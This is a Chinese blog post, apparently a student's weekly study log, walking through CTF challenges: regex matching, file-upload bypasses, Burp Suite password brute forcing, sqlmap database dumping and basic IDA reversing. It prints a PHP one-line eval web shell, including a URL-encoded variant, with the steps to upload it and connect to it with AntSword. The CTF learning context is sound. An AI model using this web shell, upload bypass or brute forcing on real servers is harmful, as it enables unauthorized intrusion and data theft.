| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> 第四周所学 -> 正文阅读 |
|
[PHP知识库]第四周所学 |
总结:参加了ctf校赛,很刺激,很好玩,也体验了一把蹲大牢的感觉 学习了简单的sql注入,进一步了解了一句话木马,还掌握了一些正则匹配,弱口令爆破,以及一些最简单的逆向入门 1.攻防世界 batman web(考察正则匹配) 2.bugku 文件上传 3.bugku 二手交易市场 4.攻防世界 ics06 5.ctf hub 弱口令爆破 6.攻防世界 newscentre(简单的sqlmap使用) 7.攻防世界 一句话<?php @eval($_POST['attack']);?> 8.10 简单的ida使用 9.burpsuite抓取网页爆破 1.攻防世界 batman web(正则匹配) 打开后是一个页面和一串代码 分析上述代码,正则匹配,首先这个字符的长度为16,其次要匹配到be0f23? 233ac? e98aa? c7be9 正则表达式中^匹配行首,$匹配行尾,所以我们知道be0f23是开头需要匹配的,e98aa是末尾匹配的,由于这个字符串的长度为16,所以我们得出be0f233ac7be98aa,刚好长度为16 将其输入网页中,be0f233ac7be98aa,恰好得到flag 2.bugku 文件上传? (小白教程) 简单翻译一下,我们要上传一张图片 这个题根据经验,应该是上传一句话木马,于是我们上传图片,以png或者jpg形式上传 但当我们上传图片文件后,他却要我们用php文件,于是我们上传php 他这个时候又要我们上传图片,于是我们需要绕过这个限制,我们开启bp进行抓包 找到路径,我们使用antsword连接 在antsword显示成功,我们进去看看 3.bugku 二手交易市场 打开后发现有很多东西,我也不知道怎么下手,右上角有个账号注册,先注册个账号看看情况 登陆后出现了 无意间看到了有个上传图片,让我意识到了文件上传中的一句话木马,我试着上传一句话木马 我们尝试上传一张图片,并开启bp进行抓包 我们发现了一串url编码 url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码(移去那些不能传送的字符,将数据排行等等)作为URL的一部分或者分离地发给服务器。不管哪种情况,在服务器端的表单输入格式样子象这样: theName=Ichabod+Crane&gender=male&status=missing& ;headless=yes URL编码遵循下列规则: 每对name/value由&;符分开;每对来自表单的name/value由=符分开。如果用户没有输入值给这个name,那么这个name还是出现,只是无值。任何特殊的字符(就是那些不是简单的七位ASCII,如汉字)将以百分符%用十六进制编码,当然也包括象 =,&;,和 % 这些特殊的字符。其实url编码就是一个字符ascii码的十六进制。不过稍微有些变动,需要在前面加上“%”。比如“\”,它的ascii码是92,92的十六进制是5c,所以“\”的url编码就是%5c。 我们把base64前面的进行url解码看看 ?我们仿照上述格式,写一句话木马,使用url进行编码,data:image/php;base64,<?php @eval ($_POST['attack']);?> ?data%3Aimage%2Fphp%3Bbase64%2C%3C%3Fphp%20%40eval%20(%24_POST%5B%27attack%27%5D)%3B%3F%3E 我们将编码后一句话密码通过bp进行上传, 在浏览器上传木马 上传成功了,我们找到路径,用antsword连接 总结:注意观察,根据base64仿照格式写一个用base64加密后的一句话木马,改包成php后得到路径,上传路径,antsword连接,查找flag 4.攻防世界? ics06 ?我们突然观察到上面的url上有个id=1,她和我们说是送分题,查看源代码 发现并没有什么有价值的东西,我试着将id改为2,看看能不能跳出什么东西,结果和上面一样,并没有什么变化,我想到了弱口令爆破,没准能在id=x,得到下一步的线索。 于是我们bp抓包,装入字典后进行爆破, 观察后得出,在字母开头时为1854,在数字开头时为1866,但我们看到了有个特殊的1901, 估计id=2333时会有下一步消息,试着将2333输入 ?cyberpeace{6ba753eed08727bf94043f25afa0836c} 5. ctf hub 弱口令爆破 抓包,装入字典,准备爆破 我们查看状态, 输入admin admin123 得到flag 6.攻防世界 newscentre 打开页面 1.发现有个搜索框,猜测存在sql注入点,我们打开bp进行抓包并保存为1.txt 2.我们开启kali中的sqlmap,由于我们保存的地方是桌面,我们输入cd 桌面 输入sqlmap -r 1.txt -D news --dump 由于这是kail上面原装的,所以我们并不需要输入python 我们进行爆破,通过查找得到flag ?7.攻防世界 一句话慕码 打开蚁剑,然后我们输入ip地址和shell,如下 加载数据,点击 cyberpeace{94905b812abda5121eda8ecbbdccaf5f} 8.简单逆向 ?? 启动场景 ?将其拖入ida中进行下一步分析 根据题目提示,并非明文比较,这个应该要解码,小写的字母并且到f,说明这个不可能是base16,猜测是十六进制,进行转换后得到如下 CrackMeJustForFun 总结:拖入IDA后进行分析,由题目提示得到十六进制转换,然后得出flag 9.bugku 爆破网页密码 ?首先我们输入数字,然后使用burpsuite抓取网页,在密码哪里加入爆破符号,然后装入字典或者使用burpsuite自带的字典进行爆破,我们调线程加快爆破速度,但是注意不能调太快,一般来说调到20即可,然后我们观察密码的length,发现有个437的与众不同的长度,这个就是密码 得到密码123456,输入回网页,得出flag 小技巧:我们观察长度的时候并不需要慢慢查找那个与众不同的长度,我们可以点击那个length按钮,然后调节为按长度排序,当出现密码后可以迅速查找 10.攻防世界 简单ida使用 我们打开exe后,将exe拖入ida中 ?启动场景,拖入ida中,在ida中暂时没有得到有效信息,一般来说,我们需要点击F5看看是否有flag,但当我点击F5后却没有发现flag,说明我们需要换另外一种思路?? 通过学习别人的write up,我知道了还有搜索功能,于是点击搜索, ,点击左上角搜索,搜索flag,得到以下答案 总结:将文件拖入ida中,可以尝试进行搜索,看是否有信息 |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/28 13:38:17- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |